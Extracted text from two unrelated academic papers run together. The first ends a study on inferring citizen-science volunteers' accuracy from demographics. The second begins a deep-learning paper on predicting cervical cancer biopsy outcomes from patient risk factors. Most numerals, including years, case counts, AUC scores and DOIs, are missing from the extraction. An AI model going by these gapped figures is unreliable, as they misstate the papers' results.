in our algorithm, when a new volunteer decides to participate in the study and performs a task, his/her accuracy is immediately inferred based on demographics. a key aspect of our bayesian approach is the selection of the individual attributes to group participants into classes. in this study, we examined the level of education and motivation based on the literature (nov, arazy & anderson, ; delaney et al., ), but other selections are also feasible. for example, underpinned by the person-environment fit theory (caplan, ), previous studies in crowdsourcing demonstrate improvement in data accuracy by matching task types with individual skills (ho, jabbari & vaughan, ), inherent cognitive abilities (goncalves et al., ), or past performance (jung & joon, ). in contrast to these studies, the advantage of our bayesian approach lies in predicting performance of classes of individual attributes. consequently, it can de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accommodate nonlinearity in the relationship between individual attributes and their performance, thereby affording more relaxed assumptions in their relationship. our bayesian approach begets enhanced data accuracy with limited effort of participants by applying a prior distribution to new participants based on their demographics. this is especially advantageous in citizen science projects that involve ongoing data collection, because practitioners do not need to recalibrate the prior distribution. however, it is necessary to do so when the nature of some new tasks or the demographics of the new participants is substantially different from the training set. another consideration is the balance between the number of classes and the number of participants in each class. as demonstrated in our results, inclusion of multiple attributes does not necessarily improve accuracy. this is because the number of classes increases in a factorial way with more attributes, leading to a less accurate predictive power in each class due to small sample sizes. when possible, practitioners should ascertain that, based on some experimental knowledge they might possess, the demographic distribution of the training set would be sufficiently balanced to ensure that a sufficient number of participants would fall in each class. in the absence of an adequate experimental knowledge, a more balanced distribution of the participants in classes can be obtained by coarse-graining the explanatory variables (garriga, piera & bartumeus, ). additionally, the information on the uncertainty associated to the training phase can be propagated to the classification stage toward mitigating the detrimental impact of a small samples size on the accuracy. it is a common practice in citizen science projects to omit collecting the demographic data of volunteers, and therefore, it is unclear whether the demographics of our participants are comparable to those in typical citizen science. it requires further study to test applicability of our method of using demographics, considering that the demographics are likely to vary depending on the nature of the projects. a further caveat for the application of our method is the necessity of having a gold standard for estimating the conditional probabilities in the training set. this is relevant for applications to binary classification tasks beyond citizen science, as in medical diagnostics, where ground truth is not available (martinez et al., ). 
in this kind of applications, alternative tools to compare and combine classifiers could be more viable (keith, davey & boyd, ). conclusions this study contributes a solution to the noisy labeler problem, which is common in citizen science. existing methods require a large sample size to estimate individual reliability (raykar et al., ; kim & ghahramani, ), which is unfeasible in most citizen science projects with limited effort of volunteers (nov, arazy & anderson, ). our simple, yet effective, algorithm can overcome the problem by focusing on classes of volunteers in a bayesian framework. the proposed approach can be readily implemented in citizen science projects by adding a simple survey during the registration to the projects. although practitioners in citizen science projects may shy away from collecting demographic information from participants in fear of low participation, such information might offer insight into the de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ societal impact of the project by assessing the value of citizen science in education and outreach (bonney et al., ). similarly, our method can be applied to crowdsourcing for distributed data analysis (difallah et al., ) toward reducing the cost of workers for the same data accuracy, as many crowdsourcing platforms already provide multidimensional, detailed attributes of each worker. whether it is to gain from limited effort of participants in citizen science or to reduce the cost of crowdsourcing workers, predicting their performance through demographics is a simple, yet powerful, way to improve data accuracy. acknowledgements we would like to thank tyrone j. tolbert for developing the experimental platform, marina torre for collecting the data, and the three reviewers for their constructive feedback that has helped improve the work and its presentation. p.d. wishes to thank the dynamical systems laboratory at new york university for hosting him during the design of the research. additional information and declarations funding this work was supported by the national science foundation cmmi . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national science foundation cmmi: . competing interests the authors declare that they have no competing interests. author contributions � pietro de lellis conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � shinnosuke nakayama analyzed the data, authored or reviewed drafts of the paper, approved the final draft. � maurizio porfiri conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the data collection was approved by the institutional review board of new york university (irb-fy - ). de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: data is available at the open science framework: de lellis, pietro. . 
“using demographics toward efficient data classification in citizen science: a bayesian approach.” osf. november . osf.io/ sqvp. references belleflamme p, lambert t, schwienbacher a. . crowdfunding: tapping the right crowd. journal of business venturing ( ): – doi . /j.jbusvent. . . . bonney r, cooper cb, dickinson j, kelling s, phillips t, rosenberg kv, shirk j. . citizen science: a developing tool for expanding science knowledge and scientific literacy. bioscience ( ): – doi . /bio. . . . . bonney r, shirk jl, phillips tb, wiggins a, ballard hl, miller-rushing aj, parrish jk. . next steps for citizen science. science ( ): – doi . /science. . burgess h, debey l, froehlich h, schmidt n, theobald e, ettinger a, hillerislambers j, tewksbury j, parrish jk. . the science of citizen science: exploring barriers to use as a primary research tool. biological conservation : – doi . /j.biocon. . . . caplan rd. . person-environment fit theory and organizations: commensurate dimensions, time perspectives, and mechanisms. journal of vocational behavior ( ): – doi . / - ( ) -x. cappa f, laut j, nov o, giustiniano l, porfiri m. . activating social strategies: face-to-face interaction in technology-mediated citizen science. journal of environmental management : – doi . /j.jenvman. . . . cappa f, laut j, porfiri m, giustiniano l. . bring them aboard: rewarding participation in technology-mediated citizen science projects. computers in human behavior : – doi . /j.chb. . . . cappa f, rosso f, hayes d. . monetary and social rewards for crowdsourcing. sustainability ( ): doi . /su . carlin bp, louis ta, carlin b. . bayes and empirical bayes methods for data analysis. boca raton: chapman and hall/crc. chen x, lin q, zhou d. . optimistic knowledge gradient policy for optimal budget allocation in crowdsourcing. proceedings of the th international conference on machine learning, pmlr ( ): – . curtis v. . motivation to participate in an online citizen science game. science communication ( ): – . dawid ap, skene am. . maximum likelihood estimation of observer error-rates using the em algorithm. applied statistics ( ): . delaney dg, sperling cd, adams cs, leung b. . marine invasive species: validation of citizen science and implications for national monitoring networks. biological invasions ( ): – doi . /s - - - . dempster ap, laird nm, rubin db. . maximum likelihood from incomplete data via the em algorithm. journal of the royal statistical society: series b ( ): – . dickinson jl, zuckerberg b, bonter dn. . citizen science as an ecological research tool: challenges and benefits. annual review of ecology, evolution, and systematics ( ): – doi . /annurev-ecolsys- - . de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://osf.io/ sqvp http://dx.doi.org/ . /j.jbusvent. . . http://dx.doi.org/ . /bio. . . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /j.biocon. . . http://dx.doi.org/ . / - ( ) -x http://dx.doi.org/ . /j.jenvman. . . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /su http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /annurev-ecolsys- - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ difallah de, catasta m, demartini g, ipeirotis pg, cudré-mauroux p. . the dynamics of micro-task crowdsourcing: the case of amazon mturk. in: proceedings of the th international conference on world wide web, florence, – . diner d, nakayama s, nov o, porfiri m. . social signals as design interventions for enhancing citizen science contributions. 
information, communication & society ( ): – doi . / x. . . estellés-arolas e, gonzález-ladrón-de guevara f. . towards an integrated crowdsourcing definition. journal of information science ( ): – doi . / . fawcett t. . an introduction to roc analysis. pattern recognition letters ( ): – doi . /j.patrec. . . . franzoni c, sauermann h. . crowd science: the organization of scientific research in open collaborative projects. research policy ( ): – doi . /j.respol. . . . frenay b, verleysen m. . classification in the presence of label noise: a survey. ieee transactions on neural networks and learning systems ( ): – . garriga j, piera j, bartumeus f. . a bayesian framework for reputation in citizen science. in: proceedings of the second workshop on data science for social good, ceur workshop proceedings. vol. , – . available at http://ceur-ws.org/vol- /paper .pdf. gelman a, carlin jb, stern hs, dunson db, vehtari a, rubin db. . bayesian data analysis. boca raton: chapman and hall/crc. goncalves j, feldman m, hu s, kostakos v, bernstein a. . task routing and assignment in crowdsourcing based on cognitive abilities. in: proceedings of the th international conference on world wide web companion, www ‘ companion. republic and canton of geneva: international world wide web conferences steering committee, – . ho c-j, jabbari s, vaughan jw. . adaptive task assignment for crowdsourced classification. in: proceedings of the th international conference on machine learning (icml- ). atlanta, – . howe j. . the rise of crowdsourcing. wired magazine ( ): – . jung hj, joon h. . quality assurance in crowdsourcing via matrix factorization based task routing. in: proceedings of the rd international conference on world wide web, www ‘ companion. new york: acm press, – . kallimanis as, panitsa m, dimopoulos p. . quality of non-expert citizen science data collected for habitat type conservation status assessment in natura protected areas. scientific reports : – . keith jm, davey cm, boyd se. . a bayesian method for comparing and combining binary classifiers in the absence of a gold standard. bmc bioinformatics ( ): doi . / - - - . kestler ha, lausser l, lindner w, palm g. . on the fusion of threshold classifiers for categorization and dimensionality reduction. computational statistics ( ): – doi . /s - - - . kim h-c, ghahramani z. . bayesian classifier combination. in: proceedings of the th international conference on artificial intelligence and statistics. la palma, – . kosmala m, wiggins a, swanson a, simmons b. . assessing data quality in citizen science. frontiers in ecology and the environment ( ): – . laut j, cappa f, nov o, porfiri m. . increasing patient engagement in rehabilitation exercises using computer-based citizen science. plos one ( ):e doi . /journal.pone. . de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / x. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /j.respol. . . http://ceur-ws.org/vol- /paper .pdf http://dx.doi.org/ . / - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ laut j, cappa f, nov o, porfiri m. . increasing citizen science contribution using a virtual peer. journal of the association for information science and technology ( ): – doi . /asi. . laut j, henry e, nov o, porfiri m. . development of a mechatronics-based citizen science platform for aquatic environmental monitoring. ieee/asme transactions on mechatronics ( ): – . 
lehner o. . crowdfunding social ventures: a model and research agenda. venture capital ( ): – doi . / . . . li q, ma f, gao j, su l, quinn cj. . crowdsourcing high quality labels with a tight budget. in: proceedings of the ninth acm international conference on web search and data mining—wsdm ‘ . new york: acm press, – . majchrzak a, malhotra a. . towards an information systems perspective and research agenda on crowdsourcing for innovation. journal of strategic information systems ( ): – doi . /j.jsis. . . . martinez ez, louzada-neto f, derchain sfm, achcar ja, gontijo rc, sarian loz, syrjänen kj. . bayesian estimation of performance measures of cervical cancer screening tess in the presence of covarates and absence of a gold standard. cancer informatics : – doi . / . nakayama s, tolbert t, nov o, porfiri m. . social information as a means to enhance engagement in citizen science-based telerehabilitation. journal of the association for information science and technology ( ): – doi . /asi. . nov o, arazy o, anderson d. . dusting for science: motivation and participation of digital citizen science volunteers. in: proceedings of the iconference on–iconference ’ . new york: acm press, – . nov o, arazy o, anderson d. . scientists@home: what drives the quantity and quality of online citizen science participation? plos one ( ):e doi . /journal.pone. . nov o, laut j, porfiri m. . using targeted design interventions to encourage extra-role crowdsourcing behavior. journal of the association for information science and technology ( ): – doi . /asi. . palermo e, laut j, nov o, cappa p, porfiri m. a. a natural user interface to integrate citizen science and physical exercise. plos one ( ):e doi . /journal.pone. . palermo e, laut j, nov o, cappa p, porfiri m. b. spatial memory training in a citizen science context. computers in human behavior : – doi . /j.chb. . . . penin j, burger-helmchen t. . crowdsourcing of inventive activities: definition and limits. international journal of innovation and sustainable development ( / ): – doi . /ijisd. . . powers dmw. . evaluation: from precision, recall and f-measure to roc, informedness, markedness & correlation. journal of machine learning technologies ( ): – . raykar vc, yu s, zhao lh, valadez gh, florin c, bogoni l, moy l. . learning from crowds. journal of machine learning research : – . ryan r, deci e. . intrinsic and extrinsic motivations: classic definitions and new directions. contemporary educational psychology ( ): – doi . /ceps. . . sauermann h, franzoni c. . crowd science user contribution patterns and their implications. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /asi. http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.jsis. . . http://dx.doi.org/ . / http://dx.doi.org/ . /asi. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /asi. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /ijisd. . http://dx.doi.org/ . /ceps. . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sheng vs, provost f, ipeirotis pg. . get another label? improving data quality and data mining using multiple, noisy labelers. in: proceeding of the th acm sigkdd international conference on knowledge discovery and data mining—kdd . new york: acm press, – . silvertown j. . a new dawn for citizen science. trends in ecology & evolution ( ): – doi . 
/j.tree. . . . swanson a, kosmala m, lintott c, simpson r, smith a, packer c. . snapshot serengeti, high-frequency annotated camera trap images of mammalian species in an african savanna. scientific data ( ): doi . /sdata. . . torre m, nakayama s, tolbert tj, porfiri m. . producing knowledge by admitting ignorance: enhancing data quality through an "i don't know" option in citizen science. plos one ( ):e doi . /journal.pone. .
supervised deep learning embeddings for the prediction of cervical cancer diagnosis kelwin fernandes , , davide chicco , jaime s. cardoso , and jessica fernandes instituto de engenharia de sistemas e computadores tecnologia e ciencia (inesc tec), porto, portugal universidade do porto, porto, portugal princess margaret cancer centre, toronto, on, canada universidad central de venezuela, caracas, venezuela abstract cervical cancer remains a significant cause of mortality all around the world, even if it can be prevented and cured by removing affected tissues in early stages. providing universal and efficient access to cervical screening programs is a challenge that requires identifying vulnerable individuals in the population, among other steps. in this work, we present a computationally automated strategy for predicting the outcome of the patient biopsy, given risk patterns from individual medical records. we propose a machine learning technique that allows a joint and fully supervised optimization of dimensionality reduction and classification models. we also build a model able to highlight relevant properties in the low dimensional space, to ease the classification of patients. we instantiated the proposed approach with deep learning architectures, and achieved accurate prediction results (top area under the curve auc = . ) which outperform previously developed methods, such as denoising autoencoders. additionally, we explored some clinical findings from the embedding spaces, and we validated them through the medical literature, making them reliable for physicians and biomedical researchers. subjects bioinformatics, computational biology, artificial intelligence, data mining and machine learning keywords dimensionality reduction, health-care informatics, denoising autoencoder, autoencoder, biomedical informatics, binary classification, deep learning, cervical cancer, artificial neural networks, health informatics introduction despite the possibility of prevention with regular cytological screening, cervical cancer remains a significant cause of mortality in low-income countries (kauffman et al., ). the cervical tumor is the cause of more than , cases per year, and kills more than , patients in the same period, worldwide (fernandes, cardoso & fernandes, ). however, cervical cancer can be prevented by means of the human papillomavirus infection (hpv) vaccine, and regular low-cost screening programs (centers for disease control and prevention (cdc), ). the two most widespread techniques in screening programs are conventional or liquid cytology and colposcopy (fernandes, cardoso & fernandes, ; plissiti & nikou, ; fernandes, cardoso & fernandes, b; xu et al., ). furthermore, this cancer can be cured by removing the affected tissues when how to cite this article fernandes et al. ( ), supervised deep learning embeddings for the prediction of cervical cancer diagnosis. peerj comput. sci. :e ; doi . /peerj-cs. submitted february accepted april published may corresponding author kelwin fernandes, kafc@inesctec.pt academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright fernandes et al.
distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kafc@�inesctec.�pt https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ identified in early stages (fernandes, cardoso & fernandes, ; centers for disease control and prevention (cdc), ), in most cases. the development of cervical cancer is usually slow and preceded by abnormalities in the cervix (dysplasia). however, the absence of early stage symptoms might cause carelessness in prevention. additionally, in developing countries, there is a lack of resources, and patients usually have poor adherence to routine screening due to low problem awareness. while improving the resection of lesions in the first visits has a direct impact on patients that attend screening programs, the most vulnerable populations have poor or even non-existent adherence to treatment programs. scarce awareness of the problem and patients’ discomfort with the medical procedure might be the main causes of this problem. furthermore, in low-income countries, this issue can be due to lack of access to vulnerable populations with low access to information and medical centers. consequently, the computational prediction of individual patient risk has a key role in this context. identifying patients with the highest risk of developing cervical cancer can improve the targeting efficacy of cervical cancer screening programs: our software performs this operation computationally in a few minutes by producing accurate prediction scores. fernandes, cardoso & fernandes ( b) performed a preliminary attempt to tackle the problem of predicting the patient’s risk to develop cervical cancer through machine learning software. in that project, the authors employed transfer learning strategies for the prediction of the individual patient risk on a dataset of cervical patient medical tests. they focused on transferring knowledge between linear classifiers on similar tasks, to predict the patient’s risk (fernandes, cardoso & fernandes, b). given the high sparsity of the associated risk factors in the population, dimensionality reduction techniques can improve the robustness of the machine learning predictive models. however, many projects that take advantage of dimensionality reduction and classification use suboptimal approaches, where each component is learned separately (li et al., ; bessa et al., ; lacoste-julien, sha & jordan, ). in this work, we propose a joint strategy to learn the low-dimensional space and the classifier itself in a fully supervised way. our strategy is able to reduce class overlap by concentrating observations from the healthy patients class into a single point of the space, while retaining as much information as possible from the patients with high risk of developing cervical cancer. we based our prediction algorithm on artificial neural networks (anns), which are machine learning methods able to discover non-linear patterns by means of aggregation of functions with non-linear activations. a recent trend in this field is deep learning (lecun, bengio & hinton, ), which involves large neural network architectures with successive applications of such functions. 
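to make the phrase "aggregation of functions with non-linear activations" concrete, the following minimal numpy sketch shows a generic two-layer feed-forward pass; the sizes, weights and data are arbitrary stand-ins chosen for illustration and do not correspond to the model or the dataset used in this work.

```python
import numpy as np

# a generic two-layer feed-forward pass: affine maps aggregated through
# non-linear activations. sizes, weights and data are arbitrary stand-ins.
rng = np.random.default_rng(0)
X = rng.random((4, 6))                        # 4 observations, 6 features in [0, 1]
W1, b1 = rng.normal(size=(6, 3)), np.zeros(3)
W2, b2 = rng.normal(size=(3, 1)), np.zeros(1)

def relu(z):
    return np.maximum(z, 0.0)

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

hidden = relu(X @ W1 + b1)                    # non-linear hidden representation
scores = sigmoid(hidden @ W2 + b2)            # probability-like output per observation
print(scores.ravel())
```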
deep learning, in fact, has been able to provide accurate predictions of patient diagnosis in multiple medical domains (xu et al., ; chicco, sadowski & baldi, ; fernandes, cardoso & astrup, a; cangelosi et al., ; alipanahi et al., ). we applied our learning scheme to deep variational autoencoders and feed-forward neural networks. finally, we explored visualization techniques to understand and validate the medical concepts captured by the embeddings. we organize the rest of the paper as follows. after this introduction, we describe the proposed method and the dataset analyzed in the methods and dataset sections. afterwards, we describe the computational prediction results in the results section, the model outcome interpretation in the discussion section, and we conclude the manuscript outlining some conclusions and future developments. methods high dimensional data can lead to several problems: in addition to high computational costs (in memory and time), it often leads to overfitting (van der maaten, postma & van den herik, ; chicco, ; moore, ). dimensionality reduction can limit these problems and, additionally, can improve the visualization and interpretation of the dataset, because it allows researchers to focus on a reduced number of features. for these reasons, we decided to map the original dataset features into a reduced dimensionality before performing the classification task. generally, to tackle high-dimensional classification problems, traditional machine learning approaches attempt to reduce the high-dimensional feature space to a low-dimensional one, to facilitate the posterior fitting of a predictive model. in many cases, researchers perform these two steps separately, deriving suboptimal combined models (li et al., ; bessa et al., ; lacoste-julien, sha & jordan, ). moreover, since dimensionality reduction techniques are often learned in an unsupervised fashion, they are unable to preserve and exploit the separability between observations from different classes. in dimensionality reduction, researchers use two categories of objective functions: one for maximizing the model capability of recovering the original feature space from the compressed low dimensional one, and another one for maximizing the consistency of pairwise similarities in both high and low dimensional spaces. since defining a similarity metric in a high-dimensional space might be difficult, we limit the scope of this work to minimizing the reconstruction loss. in this sense, given a set of labeled input vectors $X = \{x_1, x_2, \ldots, x_N\}$, where $x_i \in \mathbb{R}^D$ for all $i \in \{1, \ldots, N\}$, and $y$ is a vector with the labels associated to each observation, we want to obtain two functions $C: \mathbb{R}^D \rightarrow \mathbb{R}^M$ and $D: \mathbb{R}^M \rightarrow \mathbb{R}^D$ such that $M < D$ and that minimize the following loss: $$L_R(C, D, X) = \frac{1}{|X|} \sum_{x \in X} \big((D \circ C)(x) - x\big)^2 \quad (1)$$ namely, the composition ($\circ$) of the compressing ($C$) and decompressing ($D$) functions approximates the identity function. in the following sections, we describe the proposed dimensionality reduction technique and its instantiation to deep learning architectures. joint dimensionality reduction and classification since our final goal is to classify the data instances (observations), we do not need to achieve a good low-dimensional mapping and build the classifier independently.
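before the joint objective is introduced below, the following short numpy sketch gives a concrete reading of the reconstruction loss in eq. (1); the linear stand-ins for the compressing and decompressing functions, the array sizes and the random data are illustrative assumptions, not the learned networks used in this work, and the squared error is read here as a squared euclidean norm averaged over the observations.

```python
import numpy as np

# illustrative stand-ins for the compressing (C) and decompressing (D) functions;
# in the paper both are learned neural networks, here they are fixed linear maps.
rng = np.random.default_rng(1)
d_orig, m_red = 8, 3                    # original (D) and reduced (M) dimensionality
X = rng.random((10, d_orig))            # |X| = 10 observations

W_c = rng.normal(size=(d_orig, m_red))
W_d = rng.normal(size=(m_red, d_orig))

def compress(x):
    return x @ W_c                      # C: R^D -> R^M

def decompress(z):
    return z @ W_d                      # D: R^M -> R^D

def reconstruction_loss(X):
    residual = decompress(compress(X)) - X          # (D o C)(x) - x for every x in X
    return np.mean(np.sum(residual ** 2, axis=1))   # average squared reconstruction error

print(reconstruction_loss(X))
```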
thereby, we propose a joint loss function that minimizes the trade-off between data reconstruction and classification performance: $$L(M, C, D, X, y) = L_C\big((M \circ C)(X), y\big) + \lambda L_R(C, D, X) \quad (2)$$ where $M$ is a classifier that receives as input the vectors in the low dimensional space ($C(X)$), $L_C$ is a classification loss function such as categorical cross-entropy, and $\lambda \geq 0$. in this case, we focus on the classification performance using eq. (1) as a regularization factor of the models of interest. hereafter, we will denote this method as semi-supervised dimensionality reduction. fully supervised embeddings the previously proposed loss function consists of two components: a supervised component given by the classification task, and an unsupervised component given by the low-dimensional mapping. however, the scientific community aims at understanding the properties captured in the embeddings, especially on visual and text embeddings (kiros, salakhutdinov & zemel, ; levy, goldberg & ramat-gan, ). moreover, inducing properties in the low-dimensional space can improve the class separability. to apply this enhancement, we introduce partial supervision in the $L_R$ loss. we can explore these properties by learning the dimensionality reduction process in a supervised way, namely, learning a bottleneck supervised mapping function ($(D \circ C)(x) \approx m(x, y)$) instead of the traditional identity function ($(D \circ C)(x) \approx x$) used in reconstruction-based dimensionality reduction techniques. the reconstruction loss $L_R(C, D, X)$ becomes: $$L_m(C, D, X, y) = \frac{1}{|X|} \sum_{\langle x, y \rangle \in \langle X, y \rangle} \big((D \circ C)(x) - m(x, y)\big)^2 \quad (3)$$ where $m(x, y)$ is the desired supervised mapping. to facilitate the classification task, the removal of the overlap between both classes should be captured in the low-dimensional space. without loss of generality, we assume that the feature space is non-negative. thereby, we favor models with high linear separability between observations by using the mapping function of eq. (4) in eq. (3): $$\mathrm{sym}(x, y) = \begin{cases} x, & \text{if } y \\ -x, & \text{if } \neg y \end{cases} \quad (4)$$ in our application, if all the features are non-negative, the optimal patient's behavior associates to the zero vector, with a total lack of risk patterns. on the other hand, a patient with high feature values is prone to have cancer. within the context of cervical cancer screening, we propose the mapping given by eq. (5), where the decoded version of the healthy patients is the zero vector. this idea resembles the fact that their risk conduct has not contributed to the disease occurrence. on the other hand, we mapped ill patients to their original feature space, for promoting the low-dimensional vectors to explain the original risk patterns that originated the disease: $$\mathrm{zero}(x, y) = \mathbb{1}(y) \cdot x \quad (5)$$ while the definition of the properties of interest to be captured by the low-dimensional space is application-dependent, the strategy to promote such behavior can be adapted to other contexts. deep supervised autoencoders autoencoders are special cases of deep neural networks for dimensionality reduction (chicco, sadowski & baldi, ; vincent et al., ). they can be seen as general feed-forward neural networks with two main sub-components: the first part of the neural network is known as the encoder, and its main purpose is to compress the feature space. the neural network achieves this step by using hidden layers with fewer units than the input features, or by enforcing sparsity in the hidden representation.
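as a rough illustration of how eqs. (2), (3) and (5) can be wired together, the following keras sketch trains a multitask network with a shared encoder, a decoder fitted against the zero-mapping target, and a classification head; the layer sizes, the trade-off weight lambda, the optimizer settings and the synthetic data are assumptions made for this example, and the full architecture actually used (dropout, prelu activations and the bypass layer) is described in the following paragraphs.

```python
import numpy as np
from tensorflow.keras import Model, layers

d_in, m_code, lam = 30, 4, 0.5          # illustrative sizes and trade-off weight

inputs = layers.Input(shape=(d_in,), name="features")
code = layers.Dense(m_code, activation="relu", name="encoder")(inputs)     # C
recon = layers.Dense(d_in, activation="relu", name="decoder")(code)        # D o C
prob = layers.Dense(1, activation="sigmoid", name="classifier")(code)      # M o C

model = Model(inputs, [recon, prob])
model.compile(optimizer="rmsprop",
              loss={"decoder": "mse", "classifier": "binary_crossentropy"},
              loss_weights={"decoder": lam, "classifier": 1.0})

# synthetic stand-in data: non-negative features in [0, 1] and binary labels
rng = np.random.default_rng(2)
X = rng.random((200, d_in)).astype("float32")
y = (rng.random(200) < 0.1).astype("float32")

# zero mapping (eq. 5): healthy patients (y = 0) are decoded to the zero vector,
# ill patients (y = 1) to their original feature vector
zero_target = X * y[:, None]

model.fit(X, {"decoder": zero_target, "classifier": y},
          epochs=3, batch_size=32, verbose=0)
```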
the second part of the neural network, also known as the decoder, behaves in the opposite way, and tries to approximate the inverse encoding function. while these two components correspond to the c and d functions in eq. ( ), respectively, they can be broadly seen as a single ann that learns the identity function through a bottleneck, a low number of units, or through sparse activations. autoencoders are usually learned in an unsupervised fashion by minimizing the quadratic error eq. ( ). denoising autoencoders (da) represent a special case of deep autoencoders that attempt to reconstruct the input vector when given a corrupted version (vincent et al., ). da can learn valuable representations even in the presence of noise. scientists can experiment this task by adding an artificial source of noise in the input vectors. in the neural network architecture (fig. ), we also included a dropout layer after the input layer that randomly turns off at maximum one feature per patient (srivastava et al., ). thereby, we aim to build stable classifiers that produce similar outcomes for patients with small differences in their historical records. furthermore, we aim at producing stable decisions when patients lie on a subset of the answers to the doctors’ questions during the medical visit, by indicating absence of a given risk behavior (for example, high number of sexual partners, drug consumption, and others). we use a parametric rectifier linear unit (prelu) (he et al., ) as activation function in the hidden layers of our architectures (fig. ). prelu is a generalization of standard rectifier activation units, which can improve model fitting with low additional computational cost (he et al., ). the loss functions (eqs. and ) can learn a joint classification and encoding–decoding network in a multitask fashion (fig. ). additionally, to allow the neural network to use either the learned or the original representation, we include a bypass layer that concatenates the hidden representation with the corrupted input. in the past, researchers have used this technique in biomedical image segmentation with u-net architectures (ronneberger, fischer & brox, ) to recover possible losses in the compression process, fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and to reduce the problem of vanishing gradients. we use this bypass layer with cross-validation. in a nutshell, our contribution can be summarized as follows: (i) we formalized a loss function to handle dimensionality reduction and classification in a joint fashion, leading to a global optimal pipeline; (ii) in order to induce desired properties on the compressed space, we proposed a loss that measures the model’s capability to recreate a mapping with the desired property instead of the identity function usually applied in dimensionality reduction; (iii) we showed that multitask autoencoders based on neural networks can be used as a specific instance to solve this problem, and we instantiated this idea to model an individual patient’s risk of having cervical cancer. dataset the dataset we analyze contains medical records of patients, and covers a random sampling of patients between and who attended the gynecology service at figure deep denoising autoencoder. the blocks in blue and red represent the encoding (c) and decoding (d) components of the network, respectively. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hospital universitario de caracas in caracas, venezuela. most of the patients belong to the lowest socioeconomic status (graffar classification: iv–v (graffar, )) with low income and educational level, being the population with the highest risk. the age of the patients spans between and years old ( years old on average). all patients are sexually active and most of them ( %) have been pregnant at least once. the screening process covers traditional cytology, the colposcopic assessment with acetic acid and the schiller test (lugol’s iodine solution) (fernandes, cardoso & fernandes, b). the medical records include the age of the patient, sexual activity (number of sexual partners and age of first sexual intercourse), number of pregnancies, smoking behavior, use of contraceptives (hormonal and intrauterine devices), and historical records of sexually transmitted diseases (stds) (table ). hence, we encoded the features denoted by bool � t, t ∈ {bool, int} as two independent values: whether or not the patient answered the question and, if she did, the answered value. in some cases, the patients decided not to answer some questions for privacy concerns. this behavior is often associated with risk behaviors being a relevant feature to explore when modeling risk patterns. therefore, we added a flag feature that allows the model to identify if the question was answered or not after missing value imputation. we encoded the categorical features using the one-of-k scheme. the hospital anonymized all the records before releasing the dataset. the dataset is now publically available on the machine learning repository website of the university of california irvine (uci ml) (university of california irvine, ), figure supervised deep embedding architecture. the blocks in blue, red, and green represent the encoding (c), decoding (d), and classification (m) components of the network, respectively. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ which also contains a description of the features (university of california irvine machine learning repository, ). to avoid problems of the algorithm behavior related to different value ranges of each feature, we scaled all the features in our experiments using [ , ] normalization, and we input missing data using the average value (chicco, ). while more complex pre-processing schemes could be introduced, such as inferring the missing value with a k-nearest neighbor model (santos et al., ), we decided to use this methodology to avoid additional complexity that would make it difficult to fairly compare the explored techniques. in most cases, the features positively correlate to the cancer variable, with representing the lack of that risk pattern and representing the maximum risk. results we measured the performance of the proposed methods with the area under the precision–recall (pr) curves (davis & goadrich, ; chicco, ) and the logistic loss (also known as cross-entropy loss) function. as baseline, we use a deep feed-forward neural network with a softmax activation in the output layer. the remaining parameters (such as the initial dropout layer, depth and optimization algorithm) conform to the ones used in the proposed methodologies (table ). 
